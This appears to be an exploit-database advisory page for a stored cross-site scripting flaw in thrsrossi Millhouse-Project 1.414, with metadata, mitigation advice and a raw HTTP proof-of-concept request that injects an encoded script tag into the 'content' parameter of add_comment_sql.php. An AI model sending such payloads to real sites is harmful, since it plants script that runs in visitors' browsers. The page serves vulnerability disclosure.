header-logo
Suggest Exploit
vendor:
Millhouse-Project
by:
Cakes
8.8
CVSS
HIGH
Persistent Cross-Site Scripting
79
CWE
Product Name: Millhouse-Project
Affected Version From: 1.414
Affected Version To: 1.414
Patch Exists: NO
Related CWE: N/A
CPE: a:thrsrossi:millhouse-project:1.414
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7
2019

thrsrossi Millhouse-Project 1.414 – ‘content’ Persistent Cross-Site Scripting

A Persistent Cross-Site Scripting (XSS) vulnerability exists in thrsrossi Millhouse-Project 1.414. An attacker can send a malicious payload to the 'content' parameter of the add_comment_sql.php script, which is then stored in the database and executed when the page is loaded. This can allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

Input validation should be used to prevent malicious payloads from being stored in the database. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent the execution of malicious JavaScript code.
Source

Exploit-DB raw data:

# Exploit Title: thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
# Software Link: https://github.com/thrsrossi/Millhouse-Project.git
# Version: 1.414
# Tested on: CentOS 7
# CVE: N/A

# PoC for this XSS attack

POST /includes/add_comment_sql.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/views/single_post.php?post_id=53
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: PHPSESSID=0sqr9kui308rq66ol1uu5olb94; submenu1=block; showips=10; showurls=10; showreferers=10
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

content=%3Cscript%3Ealert%28%22TEST%22%29%3B%3C%2Fscript%3E

Navigation

Suggest Exploit

Services By CQR